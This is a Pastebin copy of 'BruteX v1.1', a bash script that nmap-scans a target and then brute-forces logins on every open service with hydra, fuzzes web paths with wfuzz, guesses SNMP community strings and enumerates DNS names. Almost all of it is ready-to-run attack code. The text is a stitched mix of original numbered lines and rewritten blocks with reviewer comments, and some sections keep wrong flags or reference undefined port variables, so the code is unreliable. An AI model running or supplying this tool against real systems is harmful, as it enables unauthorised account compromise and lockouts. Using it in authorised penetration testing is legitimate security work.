BruteX

a guest
Jul 30th, 2015
270
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.98 KB | None | 0 0
  1. #!/bin/bash
  2. # BruteX v1.1 by 1N3
  3. # http://crowdshield.com
  4. #
  5. # ABOUT:
# BruteX is a simple bash script that port-scans a target and then brute-forces logins on every service it finds open.
# Run it only against systems you are authorized to test: it makes thousands of login attempts and can lock out accounts.
  7. #
  8. # USAGE:
  9. # ./brutex <IP/hostname>
  10. #
  11. # DEPENDENCIES:
  12. # 1. NMap
  13. # 2. Hydra
  14. # 3. Wfuzz
  15. # 4. SNMPWalk
# 5. dnsdict6 (the "DNSDict" dependency; the script invokes the dnsdict6 binary)
  17. #
  18. # HYDRA SERVICES:
  19. # asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp
  20. TARGET="$1"
  21. LOOT_DIR=$PWD
  22. USER_FILE="simple-users.txt"
  23. PASS_FILE="password.lst"
  24. DNS_FILE="namelist.txt"
  25. DIRBUST_FILE="dirbuster.txt"
  26. EXT_FILE="dirbuster-ext.txt"
  27. THREADS="30"
  28. COLOR1='\033[91m'
  29. COLOR2='\033[92m'
  30. COLOR3='\033[92m'
  31. RESET='\e[0m'
  32. # UN-COMMENT TO ENABLE PROXY
  33. #export HYDRA_PROXY=socks4://127.0.0.1:9050
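# No target given: show the banner and usage, then fail. Usage output goes to
# stderr and the exit status is non-zero so a wrapper can tell "misuse" from
# "finished" (the original exited 0 here).
if [ -z "$TARGET" ]; then
  {
    echo -e "$COLOR1 __________ __ ____ ___$RESET"
    echo -e "$COLOR1 \______ \_______ __ ___/ |_ ____ \ \/ /$RESET"
    echo -e "$COLOR1 | | _/\_ __ \ | \ __\/ __ \ \ / $RESET"
    echo -e "$COLOR1 | | \ | | \/ | /| | \ ___/ / \ $RESET"
    echo -e "$COLOR1 |______ / |__| |____/ |__| \___ >___/\ \ $RESET"
    echo -e "$COLOR1 \/ \/ \_/$RESET"
    echo ""
    echo -e "$COLOR1 + -- --=[BruteX v1.1 by 1N3$RESET"
    echo -e "$COLOR1 + -- --=[http://crowdshield.com$RESET"
    # $RESET was missing on this line, which left the terminal red after exit.
    echo -e "$COLOR1 + -- --=[Usage: brutex <target IP/hostname>$RESET"
    echo ""
  } >&2
  exit 1
fi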
  48. clear
  49. echo -e "$COLOR1 __________ __ ____ ___$RESET"
  50. echo -e "$COLOR1 \______ \_______ __ ___/ |_ ____ \ \/ /$RESET"
  51. echo -e "$COLOR1 | | _/\_ __ \ | \ __\/ __ \ \ / $RESET"
  52. echo -e "$COLOR1 | | \ | | \/ | /| | \ ___/ / \ $RESET"
  53. echo -e "$COLOR1 |______ / |__| |____/ |__| \___ >___/\ \ $RESET"
  54. echo -e "$COLOR1 \/ \/ \_/$RESET"
  55. echo ""
  56. echo -e "$COLOR1 + -- --=[BruteX v1.1 by 1N3$RESET"
  57. echo -e "$COLOR1 + -- --=[http://crowdshield.com$RESET"
  58. echo ""
  59. echo ""
  60. echo -e "$COLOR3################################### Running Port Scan ##############################$RESET"
  61. nmap -T4 --open $TARGET -oX $LOOT_DIR/nmap/$TARGET.xml
  62. echo ""
  63. echo -e "$COLOR3################################### Running Brute Force ############################$RESET"
  64. port_21=`grep 'portid="21"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  65. port_22=`grep 'portid="22"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  66. port_23=`grep 'portid="23"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  67. port_25=`grep 'portid="25"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  68. port_80=`grep 'portid="80"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  69. port_110=`grep 'portid="110"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  70. port_111=`grep 'portid="111"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  71. port_135=`grep 'portid="135"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  72. port_139=`grep 'portid="139"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  73. port_162=`grep 'portid="162"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  74. port_443=`grep 'portid="443"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  75. port_445=`grep 'portid="445"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  76. port_993=`grep 'portid="993"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  77. port_1433=`grep 'portid="1433"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  78. port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  79. port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  80. port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  81. port_5901=`grep 'portid="5901"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  82. port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  83. port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  84. port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  85. if [ -z "$port_21" ]
  86. then
  87. echo -e "$COLOR1 + -- --=[Port 21 closed... skipping.$RESET"
  88. else
  89. echo -e "$COLOR2 + -- --=[Port 21 opened... running tests...$RESET"
  90. hydra -L $USER_FILE -P $PASS_FILE $TARGET ftp -t $THREADS -e ns
  91. fi
  92. if [ -z "$port_22" ]
  93. then
  94. echo -e "$COLOR1 + -- --=[Port 22 closed... skipping.$RESET"
  95. else
  96. echo -e "$COLOR2 + -- --=[Port 22 opened... running tests...$RESET"
  97. hydra -L $USER_FILE -P $PASS_FILE $TARGET ssh -t $THREADS -e ns
  98. fi
  99. if [ -z "$port_23" ]
  100. then
  101. echo -e "$COLOR1 + -- --=[Port 23 closed... skipping.$RESET"
  102. else
  103. echo -e "$COLOR2 + -- --=[Port 23 opened... running tests...$RESET"
  104. hydra -L $USER_FILE -P $PASS_FILE $TARGET telnet -t $THREADS -e ns
  105. fi
  106. if [ -z "$port_25" ]
  107. then
  108. echo -e "$COLOR1 + -- --=[Port 25 closed... skipping.$RESET"
  109. else
  110. echo -e "$COLOR2 + -- --=[Port 25 opened... running tests...$RESET"
  111. hydra -L $USER_FILE -P $PASS_FILE $TARGET smtp-enum -t $THREADS -e ns
  112. hydra -L $USER_FILE -P $PASS_FILE $TARGET smtp -t $THREADS -e ns
  113. fi
  114. if [ -z "$port_80" ]
  115. then
  116. echo -e "$COLOR1 + -- --=[Port 80 closed... skipping.$RESET"
  117. else
  118. echo -e "$COLOR2 + -- --=[Port 80 opened... running tests...$RESET"
  119. hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -t $THREADS -e ns -m /
  120. wfuzz -z file,$DIRBUST_FILE --hc 404,403,400,301,401 -c -t $THREADS http://$TARGET/FUZZ/
  121. wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,400,301,401 -c -t $THREADS http://$TARGET/FUZZ.FUZ2Z
  122. fi
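# ---- POP3 (110) ----
if [ -z "$port_110" ]; then
  echo -e "$COLOR1 + -- --=[Port 110 closed... skipping.$RESET"
else
  echo -e "$COLOR2 + -- --=[Port 110 opened... running tests...$RESET"
  hydra -L "$USER_FILE" -P "$PASS_FILE" "$TARGET" pop3 -t "$THREADS" -e ns
fi
# ---- SMB over NetBIOS (139) ----
if [ -z "$port_139" ]; then
  echo -e "$COLOR1 + -- --=[Port 139 closed... skipping.$RESET"
else
  echo -e "$COLOR2 + -- --=[Port 139 opened... running tests...$RESET"
  # -s (lowercase) is hydra's port option. The original used -S, which is the
  # SSL flag, so port 139 was never selected. Expect account lockouts on
  # domain-joined hosts if a lockout policy is in place.
  hydra -L "$USER_FILE" -P "$PASS_FILE" "$TARGET" smb -s 139 -t "$THREADS" -e ns
fi
# ---- SNMP (162) ----
# NOTE(review): the scan above is TCP-only and SNMP listens on UDP/161 (162 is
# the trap port), so this branch will rarely fire; a separate
# `nmap -sU -p 161` would be needed to detect SNMP reliably.
if [ -z "$port_162" ]; then
  echo -e "$COLOR1 + -- --=[Port 162 closed... skipping.$RESET"
else
  echo -e "$COLOR2 + -- --=[Port 162 opened... running tests...$RESET"
  # Community-string wordlist; overridable like the other lists.
  SNMP_FILE="${SNMP_FILE:-/pentest/lists/wordlist-common-snmp-community-strings.txt}"
  if [ -r "$SNMP_FILE" ]; then
    # One community string per line, kept intact (the original
    # `for a in $(cat ...)` word-split the file and mangled backslashes).
    while IFS= read -r community || [ -n "$community" ]; do
      [ -n "$community" ] || continue
      # -v2c: net-snmp needs an explicit protocol version; without one it does
      # not fall back to a community-based version and the walk fails.
      snmpwalk -v2c -c "$community" "$TARGET"
    done < "$SNMP_FILE"
  else
    echo -e "$COLOR1 + -- --=[SNMP wordlist $SNMP_FILE not readable... skipping.$RESET"
  fi
fi
# ---- HTTPS (443) ----
if [ -z "$port_443" ]; then
  echo -e "$COLOR1 + -- --=[Port 443 closed... skipping.$RESET"
else
  echo -e "$COLOR2 + -- --=[Port 443 opened... running tests...$RESET"
  # https-head speaks TLS to 443. The original called http-head with neither
  # -S nor -s, which sends plaintext to port 80 instead of the port detected.
  hydra -L "$USER_FILE" -P "$PASS_FILE" "$TARGET" https-head -t "$THREADS" -e ns -m /
  wfuzz -z "file,$DIRBUST_FILE" --hc 404,403,400,301,401 -c -t "$THREADS" "https://$TARGET/FUZZ/"
  wfuzz -z "file,$DIRBUST_FILE" -z "file,$EXT_FILE" --hc 404,403,400,301,401 -c -t "$THREADS" "https://$TARGET/FUZZ.FUZ2Z"
fi
# ---- SMB (445) ----
if [ -z "$port_445" ]; then
  echo -e "$COLOR1 + -- --=[Port 445 closed... skipping.$RESET"
else
  echo -e "$COLOR2 + -- --=[Port 445 opened... running tests...$RESET"
  # -s, not -S: see the port 139 section.
  hydra -L "$USER_FILE" -P "$PASS_FILE" "$TARGET" smb -s 445 -t "$THREADS" -e ns
fi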
  160. if [ -z "$port_993" ]
  161. then
  162. echo -e "$COLOR1 + -- --=[Port 993 closed... skipping.$RESET"
  163. else
  164. echo -e "$COLOR2 + -- --=[Port 993 opened... running tests...$RESET"
  165. hydra -L $USER_FILE -P $PASS_FILE $TARGET imap -S 993 -t $THREADS -e ns
  166. fi
  167. if [ -z "$port_1433" ]
  168. then
  169. echo -e "$COLOR1 + -- --=[Port 1433 closed... skipping.$RESET"
  170. else
  171. echo -e "$COLOR2 + -- --=[Port 1433 opened... running tests...$RESET"
  172. hydra -L $USER_FILE -P $PASS_FILE $TARGET mssql -S 1433 -t $THREADS -e ns
  173. fi
  174. if [ -z "$port_3306" ]
  175. then
  176. echo -e "$COLOR1 + -- --=[Port 3306 closed... skipping.$RESET"
  177. else
  178. echo -e "$COLOR2 + -- --=[Port 3306 opened... running tests...$RESET"
  179. hydra -L $USER_FILE -P $PASS_FILE $TARGET mysql -t $THREADS -e ns
  180. fi
  181. if [ -z "$port_3389" ]
  182. then
  183. echo -e "$COLOR1 + -- --=[Port 3389 closed... skipping.$RESET"
  184. else
  185. echo -e "$COLOR2 + -- --=[Port 3389 opened... running tests...$RESET"
  186. hydra -L $USER_FILE -P $PASS_FILE $TARGET rdp -t $THREADS -e ns
  187. fi
  188. if [ -z "$port_5900" ]
  189. then
  190. echo -e "$COLOR1 + -- --=[Port 5900 closed... skipping.$RESET"
  191. else
  192. echo -e "$COLOR2 + -- --=[Port 5900 opened... running tests...$RESET"
  193. hydra -L $USER_FILE -P $PASS_FILE $TARGET vnc -t $THREADS -e ns
  194. fi
  195. if [ -z "$port_5901" ]
  196. then
  197. echo -e "$COLOR1 + -- --=[Port 5901 closed... skipping.$RESET"
  198. else
  199. echo -e "$COLOR2 + -- --=[Port 5901 opened... running tests...$RESET"
  200. hydra -L $USER_FILE -P $PASS_FILE $TARGET vnc -S 5901 -t $THREADS -e ns
  201. fi
  202. if [ -z "$port_8000" ]
  203. then
  204. echo -e "$COLOR1 + -- --=[Port 8000 closed... skipping.$RESET"
  205. else
  206. echo -e "$COLOR2 + -- --=[Port 8000 opened... running tests...$RESET"
  207. hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -s 8000 -t $THREADS -e ns -m /
  208. wfuzz -z file,$DIRBUST_FILE --hc 404,403,400,301,401 -c -t $THREADS http://$TARGET:8000/FUZZ/
  209. wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,400,301,401 -c -t $THREADS http://$TARGET:8000/FUZZ.FUZ2Z
  210. fi
  211. if [ -z "$port_8100" ]
  212. then
  213. echo -e "$COLOR1 + -- --=[Port 8100 closed... skipping.$RESET"
  214. else
  215. echo -e "$COLOR2 + -- --=[Port 8100 opened... running tests...$RESET"
  216. hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -s 8100 -t $THREADS -e ns -m /
  217. wfuzz -z file,$DIRBUST_FILE --hc 404,403,400,301,401 -c -t $THREADS http://$TARGET:8100/FUZZ/
  218. wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,400,301,401 -c -t $THREADS http://$TARGET:8100/FUZZ.FUZ2Z
  219. fi
  220. if [ -z "$port_8080" ]
  221. then
  222. echo -e "$COLOR1 + -- --=[Port 8080 closed... skipping.$RESET"
  223. else
  224. echo -e "$COLOR2 + -- --=[Port 8080 opened... running tests...$RESET"
  225. hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -s 8080 -t $THREADS -e ns -m /
  226. hydra -L $USER_FILE -P $PASS_FILE $TARGET http-proxy -s 8080 -t $THREADS -e ns
  227. wfuzz -z file,$DIRBUST_FILE --hc 404,403,400,301,401 -c -t $THREADS http://$TARGET:8080/FUZZ/
  228. wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,400,301,401 -c -t $THREADS http://$TARGET:8080/FUZZ.FUZ2Z
  229. fi
  230. if [ -z "$port_6667" ]
  231. then
  232. echo -e "$COLOR1 + -- --=[Port 6667 closed... skipping.$RESET"
  233. else
  234. echo -e "$COLOR2 + -- --=[Port 6667 opened... running tests...$RESET"
  235. hydra -L $USER_FILE -P $PASS_FILE $TARGET irc -s 6667 -t $THREADS -e ns
  236. fi
  237. echo ""
  238. echo -e "$COLOR3################################### Brute Forcing DNS ###############################$RESET"
  239. dnsdict6 $TARGET $DNS_FILE -4
  240. echo ""
  241. echo -e "$COLOR3################################### Done! ###########################################$RESET"
  242. exit 0